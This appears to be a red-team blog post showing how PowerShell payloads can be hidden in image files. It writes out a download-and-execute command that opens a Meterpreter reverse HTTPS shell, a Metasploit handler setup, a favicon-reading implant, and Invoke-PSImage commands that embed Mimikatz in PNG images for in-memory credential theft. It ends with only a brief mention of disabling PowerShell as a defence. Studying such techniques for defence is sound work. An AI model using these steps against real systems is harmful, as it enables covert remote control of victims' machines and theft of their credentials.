Images traditionally have been used as a method of hiding a message. It is possibly for forensic investigators the oldest trick in the book to search for evidence inside that type of files. However in offensive security and red teaming pictures can hide commands, payloads and scripts.

Michael Scott developed  a python script which can generate an icon image and embed into this image a PowerShell command. The first step is to write the command into a text file.

echo 'IEX((new-object net.webclient).downloadstring(""));Invoke-Shellcode -payload windows/meterpreter/reverse_https -LHOST -LPORT 443 -force' > shellcode.txt
Favicon - Embeeded Command
Favicon – Embedded Command

The next step is to create the favicon which will contain the embedded payload, start the apache web server and move the icon to a web server directory.

python shellcode.txt evil.png
service apache2 start
mv evil.png /var/www/favicon.ico
Generation of Favicon
Generation of Favicon

Metasploit module multi/handler can be used to receive the connection once the command is executed on the target host.

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LPORT 443
Metasploit - Multi Handler Module for Favicon
Metasploit – Multi Handler Module for Favicon

The Get-FaviconText PowerShell script will download the icon into a temporary directory and it will convert the pixels back to characters in order to execute the payload command.

Import-Module .\readFavicon.ps1
Get-FaviconText -URL -WriteTo $env:TEMP
Implant - Favicon Configuration
Implant – Favicon Configuration

The Get-FaviconText script is actually the implant which needs to be executed on the target. Even if permissions are not set on the web directory to access this file the payload command inside the icon will still run.

Implant - Favicon
Implant – Favicon

A Meterpreter session will open and the target can be controlled through Metasploit.

Meterpreter via Favicon
Meterpreter via Favicon

However it is also possible to use other types of images such as JPG in order to embed not just commands but full PowerShell scripts in order to perform various other post exploitation activities. Barrett Adams developed a PowerShell module that can use pixels of a PNG file to embed a PowerShell script. This module will also generate an oneliner command for execution:

Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg -Out .\mimikatz.png -Web
Invoke-PSImage - Embedding Mimikatz in PNG
Embedding Mimikatz in PNG – Web Version

Executing the oneliner will result of running Mimikatz through a PNG file that is stored on a web server.

Mimikatz via PNG over the Web
Mimikatz via PNG over the Web

Alternatively this script can generate an oneliner for an image that is hosted locally.

Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg -Out .\mimikatz2.png
Invoke-PSImage - Embedding Mimikatz in Local PNG
Embedding Mimikatz in PNG – Local Version

Running the command will execute Mimikatz from the PNG file.

Mimikatz via PNG - Local
Mimikatz via PNG – Local


Images can be used to execute shellcode and scripts and perform other activities. There is a limitation in the number of characters that can be used therefore only images with a lot of pixels can carry a script. It is an interesting method of hiding payloads in plain sight and a type of threat that it could be prevented if PowerShell was disabled across the network.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s